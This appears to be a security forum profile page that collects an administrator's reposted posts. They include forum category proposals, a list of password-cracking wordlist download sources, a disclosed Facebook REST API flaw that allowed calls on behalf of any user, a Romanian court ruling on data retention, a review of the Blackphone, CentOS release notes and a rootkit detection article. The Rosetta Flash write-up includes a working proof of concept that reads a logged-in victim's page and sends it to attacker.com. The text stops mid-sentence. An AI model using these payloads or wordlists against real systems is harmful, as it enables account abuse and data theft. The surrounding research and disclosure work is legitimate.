Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Ar fi doua categorii: 1. Lucruri gratuite: wordlist-uri, proxy-uri etc, lucruri "free" 2. Lucruri premium: conturi Steam, licente originale etc, lucruri "premium" Astfel, am putea face o categorie "Free stuff" care sa contina lucrurile utile si o sugbategorie "Premium staff" la care sa aiba acces doar userii cu peste 100 de posturi. Pareri?
  2. [h=3]Wordlist Downloads[/h]HashKiller HashKiller AIO InsidePro APassCracker Openwall ftp.ox.ac.uk GDataOnline Cerias.Purdue Outpost9 VulnerabilityAssessment PacketStormSecurity ai.uga.edu-moby cotse1 cotse2 VXChaos Wikipedia-wordlist-Sraveau CrackLib-words SkullSecurity Rapidshare-Wordlist.rar Megaupload-birthdates.rar Megaupload-default-001.rar Megaupload-BIG-WPA-LIST-1.rar Megaupload-BIG-WPA-LIST-2.rar Megaupload-BIG-WPA-LIST-3.rar WPA-PSK-WORDLIST-40-MB-rar WPA-PSK-WORDLIST-2-107-MB-rar Article7 Rapidshare-Bender-ILLIST Rohitab Naxxatoe-dict-total-new-unsorted DiabloHorn-wordlists-sorted Bright-Shadows MIT.edu/~ecprice NeutronSite ArtofHacking CS.Princeton textfiles-suzybatari2 labs.mininova-wordmatch BellSouthpwp Doz.org.uk ics.uci.edu/~kay inf.unideb.hu/~jeszy openDS sslmit.unibo.it/~dsmiraglio informatik.uni-leipzig-vn_words.zip cis.hut.fi Wordlist.sf.cz john.cs.olemiss.edu/~sbs Void.Cyberpunk CoyoteCult andre.facadecomputer aurora.rg.iupui.edu/~schadow cs.bilkent.edu.tr/~ccelik broncgeeks.billings.k12.mt.us/vlong IHTeam Leetupload-Word Lists Offensive-Security WPA Rainbow Tables Password List depositfiles/1z1ipsqi3 MD5Decrypter/Passwords depositfiles/qdcs7nv7x ftp.fu-berlin.de Rapidshare.com/Wordlist.rar Rapidshare.com/Password.zip Megaupload/V0X4Y9NE Megaupload/0UAUNNGT Megaupload/1UA8QMCN md5.Hamaney/happybirthdaytoeq.txt sites.Google.com/ReusableSec Megaupload.com/SNK18CU0 Hotfile.com/Wordlists-20031009-iso.zip Rapidshare.com/Wordlist_do_h4tinho.zip Rapidshare.com/pass50.rar Skullsecurity.org/fbdata.torrent Uber.7z freqsort_dictionary.txt SXDictionaries.zip Hackerzlair Circlemud Sursa: Password Cracker | MD5 Cracker | Wordlist Download: Wordlist Downloads
  3. Ati invatat o prostie si va tineti de ea. Mai bine pune-i sa rezolve o ecuatie sau un challenge.
  4. Salut, Am vazut ca la Offtopic si mai ales in categoria Suff Tools sunt oferite gratuit diverse lucruri: conturi steam, VPN-uri, proxy-uri, licente si multe alte lucruri. Eu consider ca rolul categoriei Stuff tools este pentru gruparea programelor care nu se incadreaza in celelalte categorii: Programe Hack sau Programe securitate. Spre exemplu, programe de scris DVD-uri, convertit fisiere media sau oricare altele. De aceea propun o noua categorie pentru astfel de lucruri care se posteaza momentan la Stuff Tools. Primul nume care imi vine in minte e "Giveaways", dar putem alege un alt nume: "Free stuff" sau mai stiu eu ce. Votati daca sunteti de acord cu aceasta idee, iar daca sunteti, spuneti-va si parerea in legatura cu numele categoriei.
  5. Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User July 8th, 2014 Summary A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID, which could be obtained from their profile or through the Graph API. Through REST API calls it was possible to view a user’s private messages, view their private notes and drafts, view their primary email address, update their status, post links to their timeline, post as them to their friends’ or public timelines, comment as them, delete their comments, publish a note as them, edit or delete any of their notes, create a photo album for them, upload a photo for them, tag them in a photo, and like and unlike content for them. All of this could be done without any interaction on the part of the user. An Interesting Request When starting a pentest I like to browse the target site with Burp open to get a feel for how the site is structured and to see the requests that the site is making. While browsing Facebook’s mobile site touch.facebook.com the following request caught my attention: The request was used to get your bookmarks. The request was interesting for three reasons: it was making an API call rather than a request to a dedicated endpoint for bookmarks; it was being made to a nonstandard API endpoint (i.e. not graph.facebook.com); the call was not Graph API or FQL. Doing a Google search for bookmarks.get turned up nothing. After some guessing I found that the method notes.get could also be called which returned your notes. Through some more searching I found that the endpoint was using Facebook’s deprecated REST API. The Facebook REST API The REST API was the predecessor of Facebook’s current Graph API. All of the documentation for the REST API has been removed from Facebook’s website but I was able to piece together some of it from the Wayback Machine. The REST API consists of methods that can be called by both Web applications (websites) and Desktop applications (JavaScript, mobile, and desktop applications). To make a call an application makes a GET or POST request to the REST API endpoint: POST https://api.facebook.com/restserver.php method={METHOD}&api_key={API_KEY}&session_key={SESSION_KEY}&...&sig={SIGNATURE} The request consists of the method being called, the application’s API key, a session key for a user, any parameters specific to the method, and a signature. The signature is a MD5 of all of the parameters and either the application’s secret, which is generated along with the API key when the application is registered with Facebook, or a session secret which is returned with a session key for a user. Web applications sign requests with their application secret. Requests signed with the application secret can make calls on behalf of users and to administrative methods. Desktop applications sign requests with a user’s session secret. Requests signed with a session secret are limited to making calls only for that user. This allows Desktop applications to make calls without exposing their application secret (which would have to be embedded in the application). An application obtains a session key for a user through an OAuth like authentication flow. Making Calls on Behalf of Any User From reading the documentation I knew that the actual REST API endpoint was https://api.facebook.com/restserver.php which meant that the https://touch.facebook.com/api/ endpoint had to be acting as a proxy. This raised the question: What Facebook application was it proxying requests as and what permissions did the application have? So far I had only called read methods. I attempted to call the publishing method users.setStatus: Calling this method updated the status on the account that I was logged in to. The update was displayed as being made via the Facebook Mobile application: This is an internal application used by the Facebook mobile website. Many internal Facebook applications are authorized and granted full permissions for every user. I was able to confirm that this was the case for the Facebook Mobile application by calling the methods friends.getAppUsers and fql.query. Calling friends.getAppUsers showed that the application was authorized for every friend on the account that I was logged in to. Calling fql.query allowed me to make a FQL query on the permissions table to lookup the permissions that the application had been granted. That I was being authenticated with the REST server as the account that I was logged in to meant that the proxy had to be generating a session key from my session and passing it with each request. This should have limited my ability to make calls only for that account, however, I noticed that in the documentation for many of the methods a session key is optional if the method is being called by a Web application (i.e. the request is being signed with the application’s secret). For these methods a uid parameter can be passed in place of a session key and set to the user ID of any user who has authorized the application and granted it the required permission for the method being called. Through calling users.setStatus I had been able to find out what Facebook application the proxy was using, but more importantly I had been able to confirm that the proxy would pass any parameters to the REST server that I included in a request. The question now was: Was the proxy signing requests with the Facebook Mobile application secret or my session secret? And if the proxy was using the application secret, would the REST server accept the uid parameter? Including the uid parameter in a request would not stop the proxy from also passing a session key and there was the possibility that the REST server would reject the request if both were passed. To test it I tried updating the status on a different account than the one I was logged in to by calling users.setStatus with the uid parameter set to user ID of that account. It worked. The status on the account whose user ID I passed was updated. Not only was the proxy signing requests with the application secret, but equally as important, when passed both a session key and the uid parameter the REST server would prioritize the uid. The documentation for the REST API states that the use of the uid parameter is limited to only those users who have authorized the application and granted it the required permission for the method being called. Since the Facebook Mobile application had been authorized and granted full permissions for every user, it was possible to use the uid parameter to make calls on behalf of any user using any of methods that supported it. The following methods can be called with the uid parameter: [TABLE] [TR] [TD]message.getThreadsInFolder[/TD] [TD]Returns all of a user’s messages.[/TD] [/TR] [TR] [TD]users.setStatus[/TD] [TD]Updates a user’s status.[/TD] [/TR] [TR] [TD]links.post[/TD] [TD]Posts a link to a user’s timeline.[/TD] [/TR] [TR] [TD]stream.publish[/TD] [TD]Publishes a post to a user’s timeline, friend’s timeline, page, group, or event.[/TD] [/TR] [TR] [TD]stream.addComment[/TD] [TD]Adds a comment to a post as a user.[/TD] [/TR] [TR] [TD]stream.removeComment[/TD] [TD]Removes a user’s comment from a post.[/TD] [/TR] [TR] [TD]notes.create[/TD] [TD]Creates a new note for a user.[/TD] [/TR] [TR] [TD]notes.edit[/TD] [TD]Edits a user’s note.[/TD] [/TR] [TR] [TD]notes.delete[/TD] [TD]Deletes a user’s note. This method is only supposed to delete notes that were created by the user through the application. However, in my tests, when called through the proxy it would delete any note.[/TD] [/TR] [TR] [TD]photos.createAlbum[/TD] [TD]Creates a new photo album for a user.[/TD] [/TR] [TR] [TD]photos.upload[/TD] [TD]Uploads a photo for a user.[/TD] [/TR] [TR] [TD]photos.addTag[/TD] [TD]Tags a user in a photo.[/TD] [/TR] [TR] [TD]stream.addLike[/TD] [TD]Likes content for a user.[/TD] [/TR] [TR] [TD]stream.removeLike[/TD] [TD]Unlikes content for a user.[/TD] [/TR] [/TABLE] Some methods that required a session key would return additional information when called through the proxy: [TABLE] [TR] [TD]users.getInfo[/TD] [TD]Returns information on a user. This method is only supposed to return the information on the user that is viewable to the calling user. However, when called through the proxy it would return the user’s primary email address regardless of the relationship between the user and the calling user.[/TD] [/TR] [TR] [TD]notes.get[/TD] [TD]Returns the notes for a user. This method is only supposed to return the notes for the user that are viewable to the calling user. However, when called through the proxy it would return all of the user’s notes, including their drafts.[/TD] [/TR] [/TABLE] In addition to the above user methods, the following administrative methods could be called through the proxy on behalf of the Facebook Mobile application: [TABLE] [TR] [TD]admin.getAppProperties[/TD] [TD]Gets the property values set for the application.[/TD] [/TR] [TR] [TD]admin.setAppProperties[/TD] [TD]Sets the property values for the application.[/TD] [/TR] [TR] [TD]admin.getRestrictionInfo[/TD] [TD]Returns the demographic restrictions for the application.[/TD] [/TR] [TR] [TD]admin.setRestrictionInfo[/TD] [TD]Sets the demographic restrictions for the application.[/TD] [/TR] [TR] [TD]admin.getBannedUsers[/TD] [TD]Returns a list of the users who have been banned from the application.[/TD] [/TR] [TR] [TD]admin.banUsers[/TD] [TD]Bans users from the application.[/TD] [/TR] [TR] [TD]admin.unbanUsers[/TD] [TD]Unbans users from the application.[/TD] [/TR] [TR] [TD]auth.revokeAuthorization[/TD] [TD]Revokes a user’s authorization of the application.[/TD] [/TR] [TR] [TD]auth.revokeExtendedPermission[/TD] [TD]Revokes a extended permission for a user of the application.[/TD] [/TR] [TR] [TD]notifications.sendEmail[/TD] [TD]Sends an email to a user as the application.[/TD] [/TR] [/TABLE] Disclosure I reported this issue to Facebook on April 23rd. A temporary fix was in place less than three hours after my report. A bounty of $20,000 was awarded by Facebook as part of their Bug Bounty Program. Timeline April 23, 4:42pm – Initial report sent April 23, 5:50pm – Request for clarification from Facebook April 23, 6:08pm – Clarification sent April 23, 6:49pm – Acknowledgment of issue by Facebook April 23, 7:38pm – Notification of temporary fix by Facebook April 23, 8:39pm – Confirmation of temporary fix sent April 29, 11:03pm – Notification of permanent fix by Facebook April 30, 12:58am – Confirmation of permanent fix sent April 30, 8:35pm – Bounty awarded Part 2 Preview If you looked at the REST API Authentication guide and thought that there might be vulnerabilities there, you would have been correct. Both the Web and Desktop authentication flows were vulnerable to CSRF issues that led to full account takeover. These issues were less serious than the API endpoint issue as they required a user to load links while logged in to their account. However, the links could be embedded in a web page or anywhere where images can be embedded. I have embedded one as an image in this blog post. Click to display it. If you’re logged in to Facebook I’d have full access to your account (the issue has been fixed). In an actual attack loading the link would not have required a click. Sursa: Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User
  6. [h=1]CCR a decis: Legea "Big Brother", privind re?inerea ?i prelucrarea datelor personale, este neconstitu?ional?[/h] 08 Iul 2014 Curtea Constitu?ional? a României a decis ast?zi c? sunt neconstitu?ionale dispozi?iile Legii 82/2012 privind re?inerea datelor generate sau prelucrate de furnizorii de re?ele publice de comunica?ii electronice. "În urma deliber?rilor, Curtea Constitu?ional?, cu unanimitate de voturi, a admis excep?ia de neconstitu?ionalitate ?i a constatat c? dispozi?iile Legii nr.82/2012 privind re?inerea datelor generate sau prelucrate de furnizorii de re?ele publice de comunica?ii electronice ?i de furnizorii de servicii de comunica?ii electronice destinate publicului, precum ?i pentru modificarea ?i completarea Legii nr.506/2004 privind prelucrarea datelor cu caracter personal ?i protec?ia vie?ii private în sectorul comunica?iilor electronice sunt neconstitu?ionale. Cu unanimitate de voturi, a respins ca neîntemeiat? excep?ia de neconstitu?ionalitate a prevederilor art.152 din Codul de procedur? penal?", se arat? într-un comunicat al CCR. Curtea Constitu?ional? a luat în dezbatere în ?edin?a de mar?i excep?ia de neconstitu?ionalitate a dispozi?iilor Legii 82/2012 privind re?inerea datelor generate sau prelucrate de furnizorii de re?ele publice de comunica?ii electronice ?i de furnizorii de servicii de comunica?ii electronice destinate publicului, precum ?i pentru modificarea ?i completarea Legii nr.506/2004 privind prelucrarea datelor cu caracter personal ?i protec?ia vie?ii private în sectorul comunica?iilor electronice, precum ?i a dispozi?iilor art.152 din Codul de procedur? penal?. Decizia este definitiv? ?i general obligatorie ?i se comunic? celor dou? Camere ale Parlamentului, Guvernului ?i instan?elor care au sesizat Curtea Constitu?ional?. Argumenta?iile re?inute în motivarea solu?iilor pronun?ate de plenul Cur?ii Constitu?ionale vor fi prezentate în cuprinsul deciziilor, care se public? în Monitorul Oficial al României, Partea I. Sursa: Jurnalul National
  7. Abusing JSONP with Rosetta Flash In this blog post I present Rosetta Flash, a tool for converting any SWF file to one composed of only alphanumeric characters in order to abuse JSONP endpoints, making a victim perform arbitrary requests to the domain with the vulnerable endpoint and exfiltrate potentially sensitive data, not limited to JSONP responses, to an attacker-controlled site. This is a CSRF bypassing Same Origin Policy. High profile Google domains (accounts.google.com, www., books., maps., etc.) and YouTube were vulnerable and have been recently fixed. Twitter, Instagram, Tumblr, Olark and eBay still have vulnerable JSONP endpoints at the time of writing this blog post (but Adobe pushed a fix in the latest Flash Player, see paragraph Mitigations and fix). Update: Kudos to Twitter Security for being so responsive over the weekend, engaged and interested. They have fixed this on their end too. But they admitted I ruined their weekend . This is a well known issue in the infosec community, but so far no public tools for generating arbitrary ASCII-only, or, even better, alphanum only, valid SWF files have been presented. This led websites owners and even big players in the industry to postpone any mitigation until a credible proof of concept was provided. So, that moment has come . I will present this vulnerability at Hack In The Box: Malaysia this October, and the Rosetta Flash technology will be featured in the next PoC||GTFO release. A CVE identifier has been assigned: CVE-2014-4671. Slides If you prefer, you can discover the beauty of Rosetta with a set of comprehensive slides. The attack scenario To better understand the attack scenario it is important to take into account the combination of three factors: With Flash, a SWF file can perform cookie-carrying GET and POST requests to the domain that hosts it, with no crossdomain.xml check. This is why allowing users to upload a SWF file on a sensitive domain is dangerous: by uploading a carefully crafted SWF, an attacker can make the victim perform requests that have side effects and exfiltrate sensitive data to an external, attacker-controlled, domain. JSONP, by design, allows an attacker to control the first bytes of the output of an endpoint by specifying the callback parameter in the request URL. Since most JSONP callbacks restrict the allowed charset to [a-zA-Z], _ and ., my tool focuses on this very restrictive charset, but it is general enough to work with different user-specified allowed charsets. SWF files can be embedded on an attacker-controlled domain using a Content-Type forcing <object> tag, and will be executed as Flash as long as the content looks like a valid Flash file. Rosetta Flash leverages zlib, Huffman encoding and ADLER32 checksum bruteforcing to convert any SWF file to another one composed of only alphanumeric characters, so that it can be passed as a JSONP callback and then reflected by the endpoint, effectively hosting the Flash file on the vulnerable domain. In the Rosetta Flash GitHub repository I provide ready-to-be-pasted, universal, weaponized full featured proofs of concept with ActionScript sources. But how does Rosetta Flash really work? A bit more on Rosetta Flash Rosetta Flash takes in input an ordinary binary SWF and returns an equivalent one compressed with zlib such that it is composed of alphanumeric characters only. Rosetta Flash uses ad-hoc Huffman encoders in order to map non-allowed bytes to allowed ones. Naturally, since we are mapping a wider charset to a more restrictive one, this is not a real compression, but an inflation: we are effectively using Huffman as a Rosetta stone. A Flash file can be either uncompressed (magic bytes FWS), zlib-compressed (magic bytes CWS) or LZMA-compressed (magic bytes ZWS). SWF header formats. Furthermore, Flash parsers are very liberal, and tend to ignore invalid fields. This is very good for us, because we can force it to the caracters we prefer. Flash parsers are liberal. zlib header hacking We need to make sure that the first two bytes of the zlib stream, which is basically a wrapper over DEFLATE, are OK. Here is how I did that: Hacking the first byte of the zlib header. Hacking the second byte of the zlib header. There aren't many allowed two-bytes sequences for CMF (Compression Method and flags) + CINFO (malleable) + FLG (including a check bit for CMF and FLG that has to match, preset dictionary (not present), compression level (ignored)). 0x68 0x43 = hC is allowed and Rosetta Flash always uses this particular sequence. ADLER32 checksum bruteforcing As you can see from the SWF header format, the checksum is the trailing part of the zlib stream included in the compressed SWF in output, so it also needs to be alphanumeric. Rosetta Flash appends bytes in a clever way to get an ADLER32 checksum of the original uncompressed SWF that is made of just [a-zA-Z0-9_\.] characters. An ADLER32 checksum is composed of two 4-bytes rolling sums, S1 and S2, concatenated: ADLER32 checksum. For our purposes, both S1 and S2 must have a byte representation that is allowed (i.e., all alphanumeric). The question is: how to find an allowed checksum by manipulating the original uncompressed SWF? Luckily, the SWF file format allows to append arbitrary bytes at the end of the original SWF file: they are ignored. This is gold for us. But what is a clever way to append bytes? I call my approach Sleds + Deltas technique: ADLER32 checksum manipulation. Basically, we can keep adding a high byte sled (of fe, because ff doesn't play so nicely with the Huffman part we'll roll out later) until there is a single byte we can add to make S1 modulo-overflow and become the minimum allowed byte representation, and then we add that delta. Now we have a valid S1, and we want to keep it fixed. So we add a NULL bytes sled until S2 modulo-overflows, and we also get a valid S2. Huffman magic Once we have an uncompressed SWF with an alphanumeric checksum and a valid alphanumeric zlib header, it's time to create dynamic Huffman codes that translate everything to [a-zA-Z0-9_\.] characters. This is currently done with a pretty raw but effective approach that has to be optimized in order to work effectively for larger files. Twist: also the representation of tables, to be embedded in the file, has to satisfy the same charset constraints. DEFLATE block format. We use two different hand-crafted Huffman encoders that make minimum effort in being efficient, but focus on byte alignment and offsets to get bytes to fall into the allowed charset. In order to reduce the inevitable inflation in size, repeat codes (code 16, mapped to 00) are used to produce shorter output which is still alphanumeric. For more detail, feel free to browse the source code in the Rosetta Flash GitHub repository. Here is how the output file looks, bit-by-bit: Rosetta Flash output bit-by-bit. Wrapping up the output file We now have everything we need: Success! Here is a completely alphanumeric SWF file! Please enjoy an alphanumeric rickroll, also with lyrics!! (might no longer work in latest Flash Player, see paragraph Mitigations and fix) An universal, weaponized proof of concept Here is an example written in ActionScript 2 (for the mtasc open source compiler): class X { static var app : X; function X(mc) { if (_root.url) { var r:LoadVars = new LoadVars(); r.onData = function(src:String) { if (_root.exfiltrate) { var w:LoadVars = new LoadVars(); w.x = src; w.sendAndLoad(_root.exfiltrate, w, "POST"); } } r.load(_root.url, r, "GET"); } } // entry point static function main(mc) { app = new X(mc); } } We compile it to an uncompressed SWF file, and feed it to Rosetta Flash. The alphanumeric output (wrapped, remove newlines) is: CWSMIKI0hCD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333swW0ssG03 sDDtDDDt0333333Gt333swwv3wwwFPOHtoHHvwHHFhH3D0Up0IZUnnnnnnnnnnnnnnnnnnnU U5nnnnnn3Snn7YNqdIbeUUUfV13333333333333333s03sDTVqefXAxooooD0CiudIbEAt33 swwEpt0GDG0GtDDDtwwGGGGGsGDt33333www033333GfBDTHHHHUhHHHeRjHHHhHHUccUSsg SkKoE5D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7YNqdIbe13333333333sUUe133 333Wf03sDTVqefXA8oT50CiudIbEAtwEpDDG033sDDGtwGDtwwDwttDDDGwtwG33wwGt0w33 333sG03sDDdFPhHHHbWqHxHjHZNAqFzAHZYqqEHeYAHlqzfJzYyHqQdzEzHVMvnAEYzEVHMH bBRrHyVQfDQflqzfHLTrHAqzfHIYqEqEmIVHaznQHzIIHDRRVEbYqItAzNyH7D0Up0IZUnnn nnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAt33swwEDt0GGDDDGptDtwwG0GGptDDww0G DtDDDGGDDGDDtDD33333s03GdFPXHLHAZZOXHrhwXHLhAwXHLHgBHHhHDEHXsSHoHwXHLXAw XHLxMZOXHWHwtHtHHHHLDUGhHxvwDHDxLdgbHHhHDEHXkKSHuHwXHLXAwXHLTMZOXHeHwtHt HHHHLDUGhHxvwTHDxLtDXmwTHLLDxLXAwXHLTMwlHtxHHHDxLlCvm7D0Up0IZUnnnnnnnnnn nnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtuwt3sG33ww0sDtDt0333GDw0w33333www033GdFP DHTLxXThnohHTXgotHdXHHHxXTlWf7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7C iudIbEAtwwWtD333wwG03www0GDGpt03wDDDGDDD33333s033GdFPhHHkoDHDHTLKwhHhzoD HDHTlOLHHhHxeHXWgHZHoXHTHNo4D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7Ciu dIbEAt33wwE03GDDGwGGDDGDwGtwDtwDDGGDDtGDwwGw0GDDw0w33333www033GdFPHLRDXt hHHHLHqeeorHthHHHXDhtxHHHLravHQxQHHHOnHDHyMIuiCyIYEHWSsgHmHKcskHoXHLHwhH HvoXHLhAotHthHHHLXAoXHLxUvH1D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SnnwWNq dIbe133333333333333333WfF03sTeqefXA888oooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo oooooooooooooooooooooooooooooooo888888880Nj0h The attacker has to simply host this HTML page on his/her domain, together with a crossdomain.xml file in the root that allows external connections from victims, and make the victim load it. <object type="application/x-shockwave-flash" data="https://vulnerable.com/endpoint?callback=CWSMIKI0hCD0Up0IZUnnnnnnnn nnnnnnnnnnnUU5nnnnnn3Snn7iiudIbEAt333swW0ssG03sDDtDDDt0333333Gt333swwv3ww wFPOHtoHHvwHHFhH3D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7YNqdIbeUUUfV133 33333333333333s03sDTVqefXAxooooD0CiudIbEAt33swwEpt0GDG0GtDDDtwwGGGGGsGDt3 3333www033333GfBDTHHHHUhHHHeRjHHHhHHUccUSsgSkKoE5D0Up0IZUnnnnnnnnnnnnnnnn nnnUU5nnnnnn3Snn7YNqdIbe13333333333sUUe133333Wf03sDTVqefXA8oT50CiudIbEAtw EpDDG033sDDGtwGDtwwDwttDDDGwtwG33wwGt0w33333sG03sDDdFPhHHHbWqHxHjHZNAqFzA HZYqqEHeYAHlqzfJzYyHqQdzEzHVMvnAEYzEVHMHbBRrHyVQfDQflqzfHLTrHAqzfHIYqEqEm IVHaznQHzIIHDRRVEbYqItAzNyH7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7Ciud IbEAt33swwEDt0GGDDDGptDtwwG0GGptDDww0GDtDDDGGDDGDDtDD33333s03GdFPXHLHAZZO XHrhwXHLhAwXHLHgBHHhHDEHXsSHoHwXHLXAwXHLxMZOXHWHwtHtHHHHLDUGhHxvwDHDxLdgb HHhHDEHXkKSHuHwXHLXAwXHLTMZOXHeHwtHtHHHHLDUGhHxvwTHDxLtDXmwTHLLDxLXAwXHLT MwlHtxHHHDxLlCvm7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtuwt3sG 33ww0sDtDt0333GDw0w33333www033GdFPDHTLxXThnohHTXgotHdXHHHxXTlWf7D0Up0IZUn nnnnnnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAtwwWtD333wwG03www0GDGpt03wDDDGDDD 33333s033GdFPhHHkoDHDHTLKwhHhzoDHDHTlOLHHhHxeHXWgHZHoXHTHNo4D0Up0IZUnnnnn nnnnnnnnnnnnnnUU5nnnnnn3Snn7CiudIbEAt33wwE03GDDGwGGDDGDwGtwDtwDDGGDDtGDww Gw0GDDw0w33333www033GdFPHLRDXthHHHLHqeeorHthHHHXDhtxHHHLravHQxQHHHOnHDHyM IuiCyIYEHWSsgHmHKcskHoXHLHwhHHvoXHLhAotHthHHHLXAoXHLxUvH1D0Up0IZUnnnnnnnn nnnnnnnnnnnUU5nnnnnn3SnnwWNqdIbe133333333333333333WfF03sTeqefXA888ooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo888888880Nj0h" style="display: none"> <param name="FlashVars" value="url=https://vulnerable.com/account/sensitive_content_logged_in &exfiltrate=http://attacker.com/log.php"> </object> This universal proof of concept accepts two parameters passed as FlashVars: url — the URL in the same domain of the vulnerable endpoint to which perform a GET request with the victim's cookie. exfiltrate — the attacker-controlled URL to which POST a x variable with the exfiltrated data. Mitigations and fix Mitigations by Adobe Because of the sensitivity of this vulnerability, I first disclosed it internally in Google, and then privately to Adobe PSIRT. A few days before releasing the code and publishing this blog post, I also notified Twitter, eBay, Tumblr and Instagram. Adobe confirmed they pushed a tentative fix in Flash Player 14 beta codename Lombard (version 14.0.0.125, release notes) and finalized the fix in today's release (version 14.0.0.145, released on July 8, 2014). In the security bulletin APSB14-17, Adobe mentions a stricter verification of the SWF file format: These updates include additional validation checks to ensure that Flash Player rejects malicious content from vulnerable JSONP callback APIs (CVE-2014-4671). Mitigations by website owners First of all, it is important to avoid using JSONP on sensitive domains, and if possible use a dedicated sandbox domain. A mitigation is to make endpoints return the HTTP header Content-Disposition: attachment; filename=f.txt, forcing a file download. This is enough for instructing Flash Player not to run the SWF starting from Adobe Flash 10.2. To be also protected from content sniffing attacks, prepend the reflected callback with /**/. This is exactly what Google, Facebook and GitHub are currently doing. Furthermore, to hinder this attack vector in Chrome and Opera you can also return the HTTP header X-Content-Type-Options: nosniff. If the JSONP endpoint returns a Content-Type which is not application/x-shockwave-flash (usually application/javascript or application/json), Flash Player will refuse to execute the SWF. Sursa: Abusing JSONP with Rosetta Flash
  8. [h=1]A review of the Blackphone, the Android for the paranoid[/h][h=2]Custom-built with privacy in mind, this handset isn’t for (Google) Play.[/h] by Sean Gallagher - June 30 2014, 4:00am GTBST Built for privacy, the Blackphone runs a beefed-up Android called PrivatOS. Based on some recent experience, I'm of the opinion that smartphones are about as private as a gas station bathroom. They're full of leaks, prone to surveillance, and what security they do have comes from using really awkward keys. While there are tools available to help improve the security and privacy of smartphones, they're generally intended for enterprise customers. No one has had a real one-stop solution: a smartphone pre-configured for privacy that anyone can use without being a cypherpunk. That is, until now. The Blackphone is the first consumer-grade smartphone to be built explicitly for privacy. It pulls together a collection of services and software that are intended to make covering your digital assets simple—or at least more straightforward. The product of SGP Technologies, a joint venture between the cryptographic service Silent Circle and the specialty mobile hardware manufacturer Geeksphone, the Blackphone starts shipping to customers who preordered it sometime this week. It will become available for immediate purchase online shortly afterward. Articol complet: Exclusive: A review of the Blackphone, the Android for the paranoid | Ars Technica
  9. [h=1]CentOS 7.0.1406 Release Notes[/h] Last updated: July 07, 2014 Contents Translations Introduction Install Media Verifying Downloaded Installation Images Major Changes Deprecated Features Known Issues Fixed Issues Packages and Applications Packages modified by CentOS Packages removed from CentOS that are included upstream Packages added by CentOS that are not included upstream Sources How to help and get help Special Interest Groups Mailing Lists and Fora Wiki and Website [*]Further Reading [*]Thanks Sursa: Manuals/ReleaseNotes/CentOS7 - CentOS Wiki
  10. Hidden Process Detection Hiding the Rootkit Process Detecting the Hidden Rootkit Process Hidden Process Detection [HPD] using Direct NT System Call Implemenation Hidden Process Detection [HPD] using PIDB (Process ID Bruteforce) method Hidden Process Detection [HPD] with CSRSS Process Handle Enumeration Other Methods of Detecting Hidden Processes References Hiding the Rootkit Process TOP Rootkits use variety of methods to hide their processes from detection as well as termination. One of the best methods the userland rootkit can employ to evade its detection is to hook the NtOpenProcess function and return negative result for its processes. This can not only protect rootkit processes from most of the detection methods, but also prevent its termination. However, anti-rootkit software's typically use NtQuerySystemInformation to enumerate all the process ids, various handles related to process to uncover any hidden processes. To prevent against such detection, rootkits hook the NtQuerySystemInformation and temper with the results to cover all its tracks. Detecting the Hidden Rootkit Process TOP Detection of hidden process is equally challenging as rootkit can employ one or more methods to cover its presence. Here are some of the very effective methods to detect any such rootkit processes. All these detection methods work on common approach. First the list of running processes is obtained through standard API functions such as EnumProcesses or Process32First. Then any of the below methods is used to enumerate the processes and then that list is compared with previously obtained list through standard functions to find out hidden rootkit process. HPD using Direct NT System Call Implemenation TOP This is very effective method to detect any hidden userland rootkit processes. One of the lesser-known methods of enumerating the processes is to use NtQuerySystemInformation function by passing first parameter as SystemProcessesAndThreadsInformation. The drawback of this method is that it can be easily circumvented by hooking the NtQuerySystemInformation function and then by tampering with the results. The NtQuerySystemInformation is basically stub having few lines of code to transition from user to kernel land. It finally calls the NtQuerySystemInformation function within the kernel. So the trick here is to implement the NtQuerySystemInformation without directly calling the function. Here is the sample code that shows how one can directly implement NtQuerySystemInformation on various platforms. On Windows2000, INT 2E and from XP onwards 'sysenter' instruction is used to transition from user to kernel. __declspec(naked) NTSTATUS __stdcall DirectNTQuerySystemInformation (ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) { //For Windows 2000 if( OSMajorVersion == 5 && OSMinorVersion == 0 ) { __asm { mov eax, 0x97 lea edx, DWORD PTR ss:[esp+4] INT 0x2E ret 0x10 } } //For Windows XP if( OSMajorVersion == 5 && OSMinorVersion == 1 ) { __asm { mov eax, 0xAD call SystemCall_XP ret 0x10 SystemCall_XP: mov edx, esp sysenter } } //For Windows Vista & Longhorn if( OSMajorVersion == 6 && OSMinorVersion == 0 ) { __asm { mov eax, 0xF8 call SystemCall_VISTA ret 0x10 SystemCall_VISTA: mov edx, esp sysenter } } //For Windows 7 if( OSMajorVersion == 6 && OSMinorVersion == 1 ) { __asm { mov eax, 0x105 call SystemCall_WIN7 ret 0x10 SystemCall_WIN7: mov edx, esp sysenter } } } } This technique can discover any userland rootkit process and only way for rootkit process to defeat against this technique is to move into kernel. However, due to low-level implementation, there is slight risk in using this method in production code. HPD using PIDB (Process ID Bruteforce) method TOP This method was first used by BlackLight and it turned out to be very effective yet simple. Here, it enumerates through process id from 0 to 